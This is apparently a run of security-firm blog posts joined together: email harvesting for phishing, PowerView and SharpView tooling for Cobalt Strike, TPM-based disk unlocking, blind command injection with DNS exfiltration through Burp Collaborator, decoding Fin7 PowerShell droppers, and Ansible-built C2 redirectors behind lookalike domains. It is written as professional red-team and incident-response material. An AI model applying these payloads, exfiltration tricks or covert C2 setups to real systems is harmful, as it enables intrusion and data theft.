During an engagement, having an email list for your target can be useful for a variety of reasons. When it comes to social engineering and password spraying, more email addresses translate to higher chances of success. While some clients will provide an employee directory, for others it may be necessary to use other resources to obtain a working list.

Old School

Traditional email reconnaissance tools such as theHarvester work by scraping multiple search engines for any addresses that match a user-provided domain. However, depending on the organization's online presence, these types of tools may only find a few addresses, or none at all. Running theHarvester against tevora.com with all options enabled didn't turn up any useful results.

Nothing useful here

New School

While a company as a whole may be good about keeping the net clear of usable data, its individual employees usually aren't. Social media has become increasingly useful for OSINT, and it would be foolish to ignore it. Prowl, an email harvesting tool written by Matt Pickford, takes a different approach: it takes advantage of employees sharing their workplaces online to compile usable email lists.

Prowl works by scraping Bing and Yahoo for the LinkedIn profiles of people who currently work at the target organization, then converts their names into email addresses following a preconfigured format. Since people are much more likely to disclose their employer than their work email this often pulls significantly better results.

Two caveats, however: Prowl requires knowledge of the address format in use by the organization, and the resulting emails are not guaranteed to be valid. The first issue can be solved by enumerating enough emails the traditional way (such as with theHarvester) to determine the structure or, more easily, by looking at the client's contact info. For the second issue, some addresses can be manually fixed if the LinkedIn user entered their name in a nonstandard way; beyond that, there's no way to know whether the organization deviated from its standard convention when creating an individual's account. Fortunately, the valid addresses will usually outnumber the false positives.

The Test

Configuring Prowl is straightforward, with the company specified with the -c flag and the email string with the -e flag. Names or initials are inserted as variables such as <fn> for first name and <li> for last initial. Search depth measured in search engine pages can be set with -d.

./prowl.py -c Tevora -e "<fn>.<ln>@tevora.com" -d 10

No point in censoring when you can run it for yourself

Of the results from searching against Tevora, more than half of the emails generated were legitimate. Considering the lack of hits generated by theHarvester, this is definitely an improvement. Most of the false positives were from people no longer with the company, not incorrect generation, so this is hardly the tool’s fault. Overall, Prowl provided valid emails for nearly half of the organization, which is both impressive for the tool and an interesting commentary on the impact of social media.


Any red team looking to improve is constantly adapting, changing its tactics and implementing new techniques and procedures. To many professionals in the industry, this is known as Tradecraft, a term that resonates with me. Previously, I have written about various tools used by the Tevora Threat Team, such as PowerView and Cobalt Strike. Something that has come to dominate the post-exploitation scene is PowerShell: it offers an adversary major offensive capability, making it a popular choice for post-exploitation activities. However, with all the attention it has received, Microsoft has made great strides in hardening PowerShell against offensive use. As a result, using PowerShell can carry a higher chance of getting caught, meaning you can't always take advantage of feature-filled go-tos like PowerView - a gift that seems to keep on giving.

Cobalt Strike 3.11 introduced a new feature called execute-assembly, which gives the ability to execute C# assemblies in memory. This is a great opportunity for red teamers to re-tool and push post exploitation away from PowerShell and toward other avenues. Today we are releasing SharpView, a .NET port of one of our favorite tools, PowerView. SharpView offers the ability to use any of the PowerView functions and arguments in a .NET assembly. If you're familiar with PowerView, SharpView will be easy to pick up.

In addition to releasing SharpView, we are also releasing an aggressor script for PowerView 3. The script provides a graphical interface for using PowerView and SharpView all in one. This is very similar to the last PowerView aggressor script that was released, with a few changes. The aggressor script now supports PowerView 3.0 (current dev branch) and, like last time, has the ability to select either PowerPick or PowerShell as the execution method. Added to these execution methods is SharpView, which leverages execute-assembly.

However, there is a caveat with using SharpView. One of the awesome things about PowerShell and PowerView is the ability to pipe commands. As of right now, there is no way (that I know of) to pipe commands with execute-assembly.

One of the things that PowerView 3.0 offers that was not widely used in PowerView 2.0 is the ability to create and use credential objects and simulate 'runas'. The latest aggressor script offers the ability to take a credential from Cobalt Strike ("domain\user password") and parse it into a credential object.

The format for the credential differs between PowerShell, PowerPick, and execute-assembly, but to the end user it makes no difference as long as it stays in the format "domain\user password". Be aware that the credential being used will appear in the command, much like the examples in PowerView. Finally, the script has a help button that gives the description of each function and its parameters (as given in the PowerView.ps1 source).

This post will walk through the process of automatically decrypting a LUKS encrypted drive on boot using a chain of trust implemented via Secure Boot and TPM 2.

Background

The Tevora Threat Team uses deployable devices for remote testing. The current generation of these devices consists of commercial off-the-shelf mini PCs with the Unified Extensible Firmware Interface (UEFI), Secure Boot, and a Trusted Platform Module (TPM) available.

In order to better protect these systems during transit and while deployed, as they can potentially contain sensitive information, we evaluated the technology available on these devices. Initial evaluations showed that making use of the on-board TPM and Secure Boot capabilities was viable, if possibly reliant on bleeding-edge software. This post will discuss a simple, best-effort setup with custom Secure Boot and encrypted storage unlocked via the platform's TPM, touching only briefly on the details of distribution-specific implementation.

The Plan

The idea is to use a custom Secure Boot configuration to provide complete boot chain authentication, and to use the TPM to restrict access to filesystem cryptography keys unless the device is booted with a proper boot configuration. The devices Tevora uses have no functionality available for freezing or restricting access to Secure Boot configuration: Even with a BIOS management password set, it can still be reset via onboard jumpers, allowing a potential attacker to easily disable Secure Boot, thus requiring both Secure Boot and TPM policy in order to maintain platform security.

Secure Boot Setup

As it turns out, setting up a quick and simple custom Secure Boot configuration is relatively straightforward. This requires the efitools package. First, we generate the Secure Boot keys. Treat these keys with caution: with them, a potential attacker could sign a boot chain that passes verification and decrypt any of the devices. The Secure Boot private keys should only ever be used to sign new boot configurations when a kernel/initramfs update is required.
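A minimal sketch of that key generation using openssl and the efitools helpers; the key names, validity period, and GUID handling here are illustrative assumptions, not the exact commands used on our devices:

# Generate self-signed PK, KEK, and db keys, convert each certificate to an
# EFI signature list, then sign the lists into the .auth files KeyTool loads.
for key in PK KEK db; do
    openssl req -new -x509 -newkey rsa:2048 -subj "/CN=Custom $key/" \
        -keyout "$key.key" -out "$key.crt" -days 3650 -nodes -sha256
    cert-to-efi-sig-list -g "$(uuidgen)" "$key.crt" "$key.esl"
done
sign-efi-sig-list -k PK.key  -c PK.crt  PK  PK.esl  PK.auth   # PK signs itself
sign-efi-sig-list -k PK.key  -c PK.crt  KEK KEK.esl KEK.auth  # PK signs KEK
sign-efi-sig-list -k KEK.key -c KEK.crt db  db.esl  db.auth   # KEK signs db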

Next, we will generate and sign a secure boot chain. One of the quickest ways to do this with all bases covered is to use the EFI stub binary shipped with systemd-boot. This stub can be used to generate a single EFI binary containing the kernel, initramfs, and kernel command line, preventing the user from making any boot configuration changes, assuming a secure configuration of the installed OS.
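A hedged example of building and signing such a unified binary; the stub and file paths are assumptions that vary by distribution, and sbsign comes from the sbsigntool package:

objcopy \
    --add-section .osrel=/etc/os-release       --change-section-vma .osrel=0x20000 \
    --add-section .cmdline=/etc/kernel/cmdline --change-section-vma .cmdline=0x30000 \
    --add-section .linux=/boot/vmlinuz         --change-section-vma .linux=0x2000000 \
    --add-section .initrd=/boot/initrd.img     --change-section-vma .initrd=0x3000000 \
    /usr/lib/systemd/boot/efi/linuxx64.efi.stub combined.efi
sbsign --key db.key --cert db.crt --output combined-signed.efi combined.efi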

Boot KeyTool from the efitools package (available at /usr/lib/efitools/x86_64-linux-gnu/KeyTool.efi) to load the corresponding .auth files into the key slots.

Reboot. At this point, the device should only accept binaries signed via the above method.

TPM2

The devices in question contain a TPM 2, which is not supported very well in common Linux distributions. For instance, on the latest Kali rolling at the time of this post, tpm2-tools and associated software are available, but the versions provided are incapable of interacting with the TPM of our devices.

While the software is straightforward to set up, documentation is somewhat lacking on usage at a higher level beyond low-level interactions with the TPM, and command syntax has been changed many times since tutorials and documentation were written.

TPM Usage

Now for the interesting question, can we effectively use the TPM to suit our needs for unlocking encrypted storage?

It would appear that there are essentially two simple methods of accomplishing this:
1. Storing key data in TPM NVRAM, and restricting access to the NVRAM object with a policy
2. Storing the key as a persistent TPM object with a policy restricting access

Of these options, Tevora chose the latter, as the current iteration of tpm2-tools does not seem to support policy-based access to NVRAM.

The TPM2 contains a set of PCRs, or Platform Configuration Registers, which contain hashes of boot-time configuration.
Example (Dummy PCR Values):
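Something like the following, shown with tpm2-tools 3.x-era syntax and obviously dummy values (flag spellings differ between tpm2-tools releases):

$ tpm2_pcrlist -L sha1:0,2,3,7
sha1 :
  0  : 0000000000000000000000000000000000000000
  2  : 1111111111111111111111111111111111111111
  3  : 2222222222222222222222222222222222222222
  7  : 3333333333333333333333333333333333333333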

TPM2 has the ability to create policies based on PCRs: if the PCR contents do not match expectations, the policy will not authorize the action. The individual PCR values have various meanings and may be platform-specific. For the devices in question, we determined that locking PCRs 0, 2, 3, and 7 would be suitable, with the option of locking PCR 1 to freeze the BIOS configuration. PCR 7 contains a hash of the Secure Boot configuration. For tpm2-tools, this PCR list is represented as: sha1:0,2,3,7

Using this information, we can create a sequence of TPM commands to initialize the TPM and store our secret, protected by a policy locking the PCRs:
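A sketch of that sequence, written in tpm2-tools 3.x-era syntax; flag spellings changed repeatedly between releases, so adjust for your installed version. The persistent handle matches the unseal command used later in this post:

tpm2_createpolicy --policy-pcr -L sha1:0,2,3,7 -f pcr.policy   # policy digest over the chosen PCRs
tpm2_createprimary -H o -g sha256 -G rsa -C primary.ctx        # primary key in the owner hierarchy
tpm2_create -c primary.ctx -g sha256 -G keyedhash -L pcr.policy \
    -I disk-secret.bin -u seal.pub -r seal.priv                # seal the key material under the policy
tpm2_load -c primary.ctx -u seal.pub -r seal.priv -C seal.ctx  # load the sealed object
tpm2_evictcontrol -A o -c seal.ctx -S 0x81000000               # persist at a fixed handle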

Reset TPM If Required

Our devices come from the factory with the TPM locked using an unknown password. In addition, the factory specified procedure for resetting the TPM does not appear to work on these devices. The best solution we discovered for our device was to perform a recovery BIOS flash, which would reset the TPM to a blank state with no password.

In theory, this can be accomplished from software via the tpm2_clear command, if the required password is known.

Encrypted Partition Unlocking Via TPM

To unseal our secret only requires a single command, using the object's persistent handle and our list of PCRs:

tpm2_unseal -c 0x81000000 -L sha1:0,2,3,7

This can be integrated to provide decryption depending on the distribution and requirements. For instance, in Kali and other debian derived distributions, TPM2 functionality can be added to the initramfs via hooks for initramfs-tools:
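For example, a hook along these lines (a sketch; the tpm2_unseal path is an assumption based on where tpm2-tools was installed) copies the binary and its shared libraries into the initramfs:

#!/bin/sh
# /etc/initramfs-tools/hooks/tpm2 -- pull tpm2_unseal into the initramfs
PREREQ=""
prereqs() { echo "$PREREQ"; }
case "$1" in prereqs) prereqs; exit 0;; esac
. /usr/share/initramfs-tools/hook-functions
copy_exec /usr/local/bin/tpm2_unseal /bin   # copy_exec also pulls in library deps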

Use update-initramfs -u to regenerate the initramfs. Remember, we will need to regenerate our combined boot chain and re-sign it after changing the initramfs.

Using TPM from initramfs

Due to the lack of a full system environment in the initramfs, we chose not to run the TPM2 resource manager, tpm2-abrmd, there: only a single TPM command is needed to perform the unseal, and it does not use context memory.

The TPM2 resource manager is required to perform sequences of multiple TPM2 commands in many cases, as the TPM has limited available memory.

To bypass the resource manager, change the interface used by tpm2-tools to the device file: export TPM2TOOLS_TCTI="device:/dev/tpm0"

Unlocking Volume

Naturally, multiple options are available across various distributions for performing disk unlock. The following is a simple example configuration for Kali Linux, and likely other Debian-derived distributions, using the TPM to unlock a LUKS encrypted partition:
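A minimal sketch of the keyscript approach: the crypttab entry names a script whose stdout cryptsetup uses as the key. The UUID, mapper name, and script path are placeholders:

# /etc/crypttab
root_crypt UUID=<luks-partition-uuid> none luks,keyscript=/usr/local/sbin/tpm2-unlock

#!/bin/sh
# /usr/local/sbin/tpm2-unlock -- print the unsealed key material to stdout
export TPM2TOOLS_TCTI="device:/dev/tpm0"
tpm2_unseal -c 0x81000000 -L sha1:0,2,3,7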

For use in a production system, the latest versions of the tpm2 tools should be properly packaged. This step is distribution-specific and is left as an exercise for the reader. Hopefully more recent tpm2-tools can be upstreamed soon, but with the command syntax seemingly changing from week to week, it is evident why later versions have not gone into standard use.

Caveats and Potential Improvements

A single sealed object can only store key sizes of 128 bits. Possible workarounds:

Use multiple objects to store parts of the key

Use NVRAM-based key storage (pending tpm2-tools policy support)

TPM Security

TPM2 has not been analyzed to the level that TPM1 has been

Full validation of our methods has not been performed

Additional TPM functionality

Only minimal TPM functionality is discussed in this post

Plenty of additional capabilities/features not explored

Key Safety after Unseal

Ideally, measures to prevent the key from being kept in memory should be implemented

In this post we will demonstrate how Burp Collaborator can be leveraged for detecting and exploiting blind command injection vulnerabilities.

Burp Collaborator is an excellent tool provided by Portswigger in BurpSuite Pro to help induce and detect external service interactions. These external service interactions occur when an application or system performs an action which interacts with another system or service...eazy peezy. An example of an external service interaction is a DNS lookup: if you provide a hostname to a service, and it resolves that hostname, an external service interaction has likely occurred.

While Burp Collaborator has many use cases, today we'll explore a specific use case -- detecting and exploiting blind command injections.

Command injection vulnerabilities occur when user-controllable data is processed by a shell command interpreter -- the information you submitted to the application was used as part of a command run directly by the system.

Command injection vulnerabilities are serious findings, as they allow an attacker to execute commands on the underlying system hosting the web application.

Let's take a look at how Burp Collaborator could be used to help us detect and exploit the more difficult form of command injection vulnerabilities, blind command injections.

In blind command injection, we don't see any output from our injection attacks, even though the command is running behind the scenes. We generally see detection performed via payloads which cause the system to perform a noticeable action like sleep (time-based), or perhaps ping another server under our control.

Sleep Command Injected - Response Time Observed

Ping Command Injected

Ping Response Observed

With Burp Collaborator, we can often use its DNS service interaction to find these vulnerabilities a bit more easily. We're likely already using BurpSuite to assess the application, so it makes sense to leverage Collaborator.

If we can induce our target to perform an external service interaction via a command injection, we can use Collaborator to confirm it.

So you think you have a shot at blind command injection? Start up the Collaborator client!

Grab a Collaborator payload by copying it to your clipboard:

It will look something like this: 255g0p3vslus8dt7w02tj4cj8ae22r.burpcollaborator.net

Fun fact: the nslookup command uses similar syntax on Windows and Linux, making it a perfect candidate for cross-platform blind command injection tests. Just insert nslookup $collaborator-payload into your usual test cases. If a DNS lookup is performed on your payload, you'll be notified by Collaborator.

We then see the response to our injection received by the Collaborator client, confirming we have command execution.

Awesome.

Let's take it a step further. What if we wanted to exfiltrate some data? Perhaps we're unable to gain a shell from our injection attempts, and we need to figure out why -- or we just want a better proof of concept for our report.

Collaborator gives us a really simple and effective option for this, without leaving BurpSuite to set up additional tools during a test.

We can use Collaborator to pull back some details about the target by prepending system data to the DNS lookup. Collaborator will accept lookups to any subdomain requested on the payload (keeping in mind the 63 character limit for subdomains, and the 253 character limit for the overall DNS lookup).
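For example, a hypothetical injection reusing the payload from above: shell command substitution prepends command output as a subdomain, so the hostname Collaborator receives carries one label of exfiltrated data per lookup.

nslookup $(whoami).255g0p3vslus8dt7w02tj4cj8ae22r.burpcollaborator.net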

Tevora employs a lot of different tools depending on what our need is. During penetration tests and red teams, one of the most common is PowerView from PowerSploit. PowerView is an excellent tool for performing reconnaissance in Windows environments and provides a wealth of value. The functions inside of it provide an alternative to native Windows commands that may get flagged by various detection tools. For example, rather than executing net user admin /domain (which would most likely trigger alerts), you could run Get-NetUser -UserName admin, which uses the Active Directory Service Interfaces and the Lightweight Directory Access Protocol. This is a very simple example of what can be done with PowerView, but it highlights some of its usability. In addition to functionality that mirrors native Windows commands, it contains a handful of extremely useful custom functions as well.

Another tool commonly used by Tevora's threat team is Cobalt Strike. Cobalt Strike offers a lot of great features as well and is a common go-to tool for red teams. One of its great features is Aggressor, the scripting language built into Cobalt Strike, which allows people to extend its functionality for their needs.

One of the things Tevora has done is create an Aggressor script that provides an interface for using PowerView. Tevora has released this Aggressor script on GitHub, where it can be found here. The script gives end users a GUI for all of the functions built into PowerView.

This is broken up the same way harmj0y broke it up on the PowerView README page.

While interacting with a Cobalt Strike beacon, a user can right-click and see all the PowerView options available. With the number of functions built into PowerView, it is easy to forget what is available to you, which often prompts users to open up the .ps1 file and read through the code/options. One of the good things about this interface is the ability to see everything available right away and to read a quick synopsis of each function.

The text boxes within the interface indicate data that will be used for the PowerView functions, while check boxes indicate switches. Additionally, users can select whether to use PowerPick (Unmanaged PowerShell) or PowerShell to execute their PowerView functions, which gives a little more customization to what the end user wants to do.

There are a lot of ways PowerView can be used in PowerShell commands, with execution of multiple functions at once to get specific data. Unfortunately, in its current state this script does not offer the ability to do those things; it simply offers the end user an interface to PowerView and an easy way of remembering all the functions and their arguments. Note that this script does not automatically perform a powershell-import on PowerView.ps1 within Cobalt Strike, so when using it, users should always make sure PowerView has been imported beforehand or that they are interacting with a beacon where it is imported.

TL;DR Here's how to decode some PowerShell commands so you can find IPs and other IOCs.

Background

Through consulting with several of our clients during IR engagements, we have discovered that many clients are taking steps to restrict and log PowerShell in their environments. However, in several engagements we have also discovered that many analysts are unable to extract the correct information from these logs to begin containment or investigate further. Understanding the commands that are wreaking havoc in your environment is critical to the incident response process.

Understanding Common PowerShell Exploits

Let's take a look at a common PowerShell exploit structure and break it down to better understand what's going on. Fin7, and copycats, like to use this method (A LOT), so it's a good place to start:
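A hypothetical payload of this shape; the base64 blob is a placeholder, and the exact stream classes vary from sample to sample:

powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C "sal a New-Object; iex (a IO.StreamReader((a IO.MemoryStream(,[Convert]::FromBase64String('<base64-payload>'))), [Text.Encoding]::ASCII)).ReadToEnd()"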

In a nutshell: the payload calls PowerShell, gives it some flags to make sure it executes, sets a command alias 'a', and provides the true payload to be decoded and executed.
The first section of the command calls PowerShell and some flags:

powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C

These options are:

NoE - NoExit

Doesn't exit after running the command, i.e. creates a process and stays running as powershell.exe

NoP - NoProfile

Doesn't load the PowerShell profile

NonI - NonInteractive

Doesn't create an interactive prompt, i.e. it runs the command without popping up a persistent PowerShell terminal on the user's screen

ExecutionPolicy Bypass

Bypasses the execution policy if it is set (self-explanatory)

C - Command

What to run (again, pretty self-explanatory)

This section allows PowerShell to execute a command that will be invisible to the user and create a process that stays running after the command executes.

The second portion of the command is where things get interesting, and this is where the actual forensics begins:

The Set-Alias cmdlet, invoked via its alias 'sal', creates a shortcut 'a' for New-Object. The subsequent section uses the Invoke-Expression cmdlet 'iex' to execute the payload, which consists of the alias 'a' and some classes that convert a base64 encoded string into a memory stream. So, the command executed is actually this:
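With the alias expanded, our hypothetical payload's executed command is equivalent to:

iex (New-Object IO.StreamReader((New-Object IO.MemoryStream(,[Convert]::FromBase64String('<base64-payload>'))), [Text.Encoding]::ASCII)).ReadToEnd()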

Honestly, it sounds more complicated than it really is. It just reads a string into memory and executes it. There's not a ton going on in this command, but once you understand it, you can modify it to make it output the real information you want.

Modifying the Payload to Identify its Contents

We know the payload is reading something into memory and executing it. So, here's an idea: let's just read it and NOT execute it. What's causing the execution? In the section above, we identified the call to PowerShell with its flags, and the 'IEX' cmdlet. Here's the magic: ALL YOU NEED TO DO IS REMOVE 'IEX', THE DOUBLE QUOTES, AND THE FLAGS!!!!

Once you remove the execution commands (powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C, "", and iex) from the payload you're left with:
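Continuing the hypothetical sample from above (placeholder base64), the defanged version only prints the decoded string:

sal a New-Object; (a IO.StreamReader((a IO.MemoryStream(,[Convert]::FromBase64String('<base64-payload>'))), [Text.Encoding]::ASCII)).ReadToEnd()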

This payload is now safe to run in PowerShell. All it does now is set the alias 'a' and read a string into memory. Here's a look at an actual payload from Fin7, and how we used this same method to identify one of their C2 servers.

Once you remove the "powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C", "iex", and wrapping double-quotes, the payload will decode the string and print it to the screen. It really is that simple. Just remove the "execution" from the command, and it becomes a benign payload.

What you need to focus on is identifying the execution within a command. Once you find all the executable calls, you can delete them or replace them with non-executable functions, such as writing out to text files. The above example is simple because the IEX command is in plain sight, and the attackers make no effort to further obfuscate their payloads.

Be diligent in examining the command before running anything. We recommend taking it one step further and using a VM with no network access when attempting to run these payloads as demonstrated. You don't want to gift an attacker a shell with admin privileges while you're investigating!

Further Investigation

The command from our example spawns a Meterpreter shell, as seen in the decoded payload.

While there are plenty of other C2 frameworks, attacker methodologies are similar and almost always include the following: establish C2, establish persistence, dump creds, and pivot. It's fair to assume that this is just the beginning, and after this payload is run, there will be a healthy dose of Mimikatz, pass-the-hash, wmi-exec, etc.

Some tips for following up after discovering a payload like this would be:

Don't block the IP just yet. You want to identify all affected systems and determine if multiple C2s are being used. Attackers like Fin7 have been known to use between 3 and 5 different C2s for a single attack.

Do a quick investigation on any other affected hosts, so that you can give them all the ban-hammer at once. Otherwise you could end up playing whack-a-mole for a while.

Review logs for all devices that connect back to the attacker's identified IP

Review all internal connections to and from the affected host (especially SMB traffic)

Review all external connections to and from the affected host (including DNS traffic)

Review anomalous or suspicious activity from these hosts, such as connections to Dropbox, Google Docs, etc., to determine if data was exfiltrated.

Don't start recovery until it's certain the threat has been removed. The last thing you want to do is spend a ton of hours recovering (resetting passwords, reimaging, etc.) and then have to do it all over again for the same incident!

This blog will cover what redirectors are, why they are important for red teams, and how to automate their deployment with Ansible. This is the first post in our RTOps blog series, and will serve as a jumping-off point for further redirector strategies and Red Team infrastructure automation.

What are redirectors

Redirectors sit in front of our actual C2 servers, and securely proxy command and control traffic from the target back to our C2 listeners. These prevent the client from being able to see our actual C2, and should be easy to spin up and tear down.

Redirectors come in many forms, from the hop.php applications popularized by Metasploit and Empire, to something as simple as socat.
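As a taste of the latter, a one-line socat redirector that forwards HTTPS traffic to a C2 server (the IP and port are placeholders):

socat TCP4-LISTEN:443,fork TCP4:10.0.0.5:443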

We are going to focus on deploying redirectors using hop.php AND/OR mod_rewrite, allowing them to support Empire and Cobalt Strike agents with the following features:

Proxy traffic to our C2 servers

Redirect or proxy unwanted traffic away from our c2 servers

Have legimate publicly signed certificates with communication over https

To meet all these goals, Apache with mod_rewrite is an excellent choice.

Redirecting using mod_rewrite

Mod_rewrite is a great component of Apache that allows us to transparently proxy or redirect requests based on regular expression matches. This could, for example, allow our evil 'amazonss.com' site to redirect or proxy traffic to 'amazon.com', making it appear legit. If traffic matching our C2 profile hits the server, however, mod_rewrite will transparently proxy the request to our C2 servers.
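A tiny hedged illustration of the idea; the URI pattern, C2 address, and decoy destination are placeholders (real-world profiles are covered in the writeup referenced below):

RewriteEngine On
# Requests matching the C2 profile are invisibly proxied to the team server
RewriteCond %{REQUEST_URI} ^/safebrowsing/.*$
RewriteRule ^.*$ https://10.0.0.5%{REQUEST_URI} [P]
# Everything else bounces to the impersonated site
RewriteRule ^.*$ https://amazon.com/ [L,R=302]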

@bluescreenofjeff has an awesome writeup on how to do this. Rather than re-cover what Jeff has already written, this blog will go over how to deploy redirectors using his method, with a few tweaks to work better with Ansible and Let's Encrypt.

Automating Redirector Deployment with Ansible

To deploy our redirectors, we will be using Ansible, a configuration management tool comparable to Puppet, Chef, and Fabric. Ansible is nice because it is agentless and works completely over SSH. We are introducing Ansible now because we will be baking many of our commands and configurations into Ansible configs, so we will be covering both redirector setup and Ansible features as we go.

Ansible Primer

If you already know ansible, feel free to skip this section. For those that don't, this section is mostly guidance on which portions of Ansible's documentation you need to read or reference to understand the configurations we go over in this post.

Playbooks
Ansible uses config files in YAML format to specify actions it takes on remote servers. These configurations are called 'playbooks'.

We leverage this in our automation by creating a redirector role, which consists of all the legwork to spin up and configure a redirector. Our playbooks to deploy specific redirectors largely consist of variables to be passed to this role. This allows us to separate the configuration of a unique redirector instance from the general process of setting up a redirector.

If you don't fully follow the documentation for ansible roles, don't worry. Most of this post will go through creating the redirector role, so you can learn by example.

Ansible Redirector Role

Requirements

Alright, we are almost ready to dive into creating our Ansible role to facilitate redirector provisioning. First, let's walk through some formal requirements of our role so we know what tasks we need to implement:

Apache Installation: We need to make sure we have apache installed with the proper modules

Apache Configuration: We need to set up configurations for our redirectors. We can use vhosts for per-domain configuration

Copy Hop.php File(s) to Server: We need to get our hop.php file to the server if using that method of redirection.

Redirector Rules: We need to install the redirector rules. We can do this in our apache config's vhost section instead of .htaccess files

Let's Encrypt Installation: We need to install Let's Encrypt and python-certbot-apache on the target servers

Let's Encrypt Configuration: We will want Let's Encrypt to set up legit public certs for our sites.

Ok, we've got a pretty decent list to get started on. Let's start making our role.

Role Structure

We won't need all of these folders for our role, but it is good to lay out the initial structure before we start work (a typical skeleton is sketched below). Each folder has special meaning in the context of a role. Most importantly, the tasks folder will contain all the tasks we want to run. When you import or include a role in a playbook, it will execute the file main.yml in the tasks folder.
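A typical role skeleton, as generated by ansible-galaxy init; we will mainly use the tasks and templates folders:

roles/redirectors/
├── tasks/
│   └── main.yml
├── templates/
├── files/
├── handlers/
├── vars/
└── defaults/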

We could put all our tasks in that main.yml file, but it is better to break them out into multiple files for readability and re-use. Looking at our requirements list, we can see our tasks break down into two general categories: setting up Apache, and setting up Let's Encrypt.

We can 'include' the apache and letsencrypt files in main.yml, allowing them to be run when we use the redirectors role.

main.yml

---
- include: "apache.yml"
- include: "letsencrypt.yml"

Right now both apache.yml, and letsencrypt.yml are empty, so using the role will not do anything. However, we now are ready to start implementing our tasks in those two files.

Setup Apache

Installation

Installing packages with Ansible is a cinch. To keep it even simpler, we will just be supporting Debian-based systems with this role. We can leverage the 'apt' task to make sure Apache and the required dependencies are installed on our target server.
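A sketch of that task (package names assumed for a Debian/Kali target):

- name: Install Apache and PHP
  apt:
    name: ['apache2', 'php', 'libapache2-mod-php']
    state: present
    update_cache: yes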

Our apache.yml file now will install apache, php, and libapache2-mod-php.

Next, we will append the following to our apache.yml to enable the headers, rewrite, proxy, ssl, proxy_http, and php7.0 mods. We will also disable mod_deflate and mod_cache to ensure our redirector doesn't encode or otherwise process our C2 traffic in undesirable ways (apache.yml continued below).
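A sketch of those additions; the module list and the hop_dir convention follow this post, and handlers are omitted for brevity:

- name: Enable required Apache modules
  apache2_module: name={{ item }} state=present
  with_items: ['headers', 'rewrite', 'proxy', 'proxy_http', 'ssl', 'php7.0']

- name: Disable modules that could mangle C2 traffic
  apache2_module: name={{ item }} state=absent
  with_items: ['deflate', 'cache']

- name: Copy hop.php file(s) into the web root when hop_dir is set
  copy: src="{{ hop_dir }}/" dest=/var/www/html/
  when: hop_dir is defined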

Now when we have the hop_dir variable defined in our redirector instance playbook, it will copy the contents of that directory on our local host into the root of our site.

Before we go any further, we need to cover how variables will be laid out in our instance playbooks, and how they interact with our role. Let's do that by walking through a completed playbook that will set up our redirector instance using our redirectors role.
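Here is a hypothetical completed playbook; the variable names (hop_dir, vhosts, and the per-vhost keys) are assumptions the role sketches in this post rely on, and the domains, IPs, and rule strings are placeholders:

- hosts: redirectors
  become: yes
  roles:
    - { role: redirectors,
        hop_dir: "files/hop",
        vhosts: [
          { servername: "amazonss.com", ssl: true,
            rewrite_rules_file: "files/amazonss_rules.conf" },
          { servername: "updates-cdn.net", ssl: false,
            rewrite_rules: ["RewriteCond %{REQUEST_URI} ^/safebrowsing/.*$",
                            "RewriteRule ^.*$ https://10.0.0.5%{REQUEST_URI} [P]"] }
        ] }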

OK, that was a lot to cover, but hopefully this config file and layout are making sense. We formatted this config mostly in JSON style (YAML is a superset of JSON), but you can format it however you like as long as it matches up.

Notice in the config how there are multiple vhosts, and each one can use one or more methods of specifying the config

Back to the Role: VHOST Configs

With a schema decided for our redirector Role variables, we can move back to developing the role.

Now, we will set up our vhost configs. This is a bit more complicated than our previous tasks as we will need to not only add a task but include templates to define the config files.

These template files will allow us to build most of the config file, and dynamically replace portions of it based on our Ansible variables.

First, let's create the tasks to instantiate the templates and copy them to the server (a sketch follows the summary below).

These tasks:

1. take in the specified template files
2. for EACH vhost in vhosts, do the following:
   a. pass in the 'vhost' variable, which will be named 'item' in the template
   b. run the Jinja2 templating engine
   c. copy the output to the Apache config directory on the server, with the filename prefixed rt_ for HTTP sites or rtssl_ for HTTPS sites and appended with the vhost's servername
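A sketch of those tasks; the template file names are assumptions:

- name: Instantiate HTTP vhost configs
  template:
    src: http_vhost.conf.j2
    dest: "/etc/apache2/sites-available/rt_{{ item.servername }}.conf"
  with_items: "{{ vhosts }}"

- name: Instantiate HTTPS vhost configs
  template:
    src: ssl_vhost.conf.j2
    dest: "/etc/apache2/sites-available/rtssl_{{ item.servername }}.conf"
  with_items: "{{ vhosts }}"
  when: item.ssl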

The reason we create one configuration file per vhost is that Let's Encrypt, specifically the certbot-apache component, does not support more than one vhost per config file. Because of this, we provision multiple configuration files to the server.

Now let's create the SSL and HTTP templates. Make the template files and place them in your templates folder so that your directory tree now looks like this:
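A sketch of the layout, using the template names assumed above:

roles/redirectors/
├── tasks/
│   ├── main.yml
│   ├── apache.yml
│   └── letsencrypt.yml
└── templates/
    ├── http_vhost.conf.j2
    └── ssl_vhost.conf.j2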

The final tasks disable all existing sites, to prevent having more than one vhost per config file and breaking Let's Encrypt. Then, all the red team sites are enabled. Boom, we now have our Apache server stood up with all the proper configs!
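Concretely, those site-toggling tasks might look like this sketch (the rm approach is blunt but unambiguous; names follow the rt_/rtssl_ convention):

- name: Disable all existing sites
  shell: rm -f /etc/apache2/sites-enabled/*

- name: Enable red team HTTP sites
  command: a2ensite "rt_{{ item.servername }}"
  with_items: "{{ vhosts }}"

- name: Restart Apache
  service: name=apache2 state=restarted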

Ok, that's it! We've done it! We've developed a role that allows us to quickly deploy a redirector to an existing server!

The next step is to run the role. Create your playbook in the form of the example we covered and run ansible-playbook -i <your_hosts_file> <your_playbook>. Ensure that this role is in the roles directory in the same path as your playbook, and that your hop and/or config files are placed correctly. Your directory layout should look like this:
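A sketch of that layout (names are placeholders):

deploy/
├── playbook.yml
├── hosts
├── files/
│   └── hop/
│       └── hop.php
└── roles/
    └── redirectors/
        ├── tasks/
        └── templates/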

Closing Thoughts

This redirector configuration automation is just a basis for our red team infrastructure automation. By building on this substrate, we can build powerful tools to bring up C2 servers quickly and effectively. Next post we'll discuss how we can automate the server creation itself and provision these redirectors based on dynamic Terraform state files. See you then.

Release

We are releasing the SecSmash tool we announced at BSIDES LV. SecSmash is a framework that allows you to turn centralized management, monitoring, and security tools into C2 infrastructure. Check out the tool on Github: https://github.com/tevora-threat/SecSmash

SecSmash is a modular framework for leveraging credentials for enterprise security tools to own the enterprise. Instead of spinning up your own C2 on a pentest, leverage the C2 that organizations have already deployed.

The Framework

We've built an HTTP integrator that takes inputs, plus extractions that generate new inputs, to drive a chain of HTTP requests to authenticate to the target system, enumerate connected hosts, and run commands.

Integrations can also be built from scratch if they match the Integrator interface.

We will be shoring up our documentation in the coming months and are hoping to see community involvement in module creation and sharing!

Background

